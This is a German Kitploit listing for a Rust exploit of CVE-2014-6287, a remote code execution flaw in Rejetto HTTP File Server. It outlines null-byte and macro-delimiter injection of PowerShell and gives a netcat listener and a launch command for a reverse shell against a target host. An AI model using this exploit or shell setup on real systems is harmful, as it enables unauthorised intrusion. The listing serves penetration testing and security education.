Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6287 — Eine Rust-Implementierung des CVE-2014-6287-Exploits, der Rejetto HTTP File Server (HFS) in den Versionen 2.3x vor 2.3c angreift. | Kitploit
Tools/GitHubGitHub/nika0x38/cve-2014-6287
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Eine Rust-Implementierung des CVE-2014-6287-Exploits, der Rejetto HTTP File Server (HFS) in den Versionen 2.3x vor 2.3c angreift.

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2014-6287 - Rejetto HTTP File Server RCE-Exploit

Rust Security

Eine Rust-Implementierung des Exploits für CVE-2014-6287, der gegen Rejetto HTTP File Server (HFS) Versionen 2.3x vor 2.3c gerichtet ist.

Überblick über die Schwachstelle

CVE-2014-6287 ist eine kritische Schwachstelle zur Remote-Codeausführung im Rejetto HTTP File Server (HFS).

Technische Details

  • Betroffene Software: Rejetto HTTP File Server (HFS) 2.3x vor 2.3c
  • Schwachstellentyp: Remote Code Execution (RCE)
  • CVSS-Score: 10.0 (Kritisch)
  • CWE: CWE-94 (Unzureichende Kontrolle der Generierung von Code)

Beschreibung

Die Funktion findMacroMarker in im Rejetto HTTP File Server ermöglicht es entfernten Angreifern, beliebige Programme über eine -Sequenz in einer Suchaktion auszuführen. Diese Schwachstelle erlaubt es Angreifern, die Eingabevalidierung zu umgehen und schädlichen Code einzuschleusen, der auf dem Zielsystem ausgeführt wird.

parserLib.pas
%00

Der Exploit funktioniert wie folgt:

  1. Erstellen einer bösartigen Suchabfrage, die ein Nullbyte (%00) enthält
  2. Einschleusen von PowerShell-Befehlen innerhalb der Makrobegrenzer {. und .}
  3. Der Server verarbeitet das Makro und führt den eingebetteten PowerShell-Code aus
  4. Aufbau einer Reverse-Shell-Verbindung zurück zum Angreifer

Verwendung

Schritt 1: Netcat-Listener einrichten

Bevor Sie den Exploit ausführen, richten Sie einen Listener auf Ihrem Angreiferrechner ein, um die Reverse-Shell zu empfangen:

root@kitploit:~
# Ersetzen Sie <LPORT> durch den gewünschten Listening-Port
nc -lvnp <LPORT>

Schritt 2: Den Exploit ausführen

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Erforderliche Parameter:

  • -l, --lhost <LHOST>: Ihre lokale IP-Adresse (Angreiferrechner)
  • -p, --lport <LPORT>: Ihr lokaler Port für die Reverse-Shell
  • -r, --rhost <RHOST>: Ziel-IP-Adresse (verwundbarer HFS-Server)

Optionale Parameter:

  • -t, --rport <RPORT>: Zielport (Standard: 80)

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben.

Tool herunterladen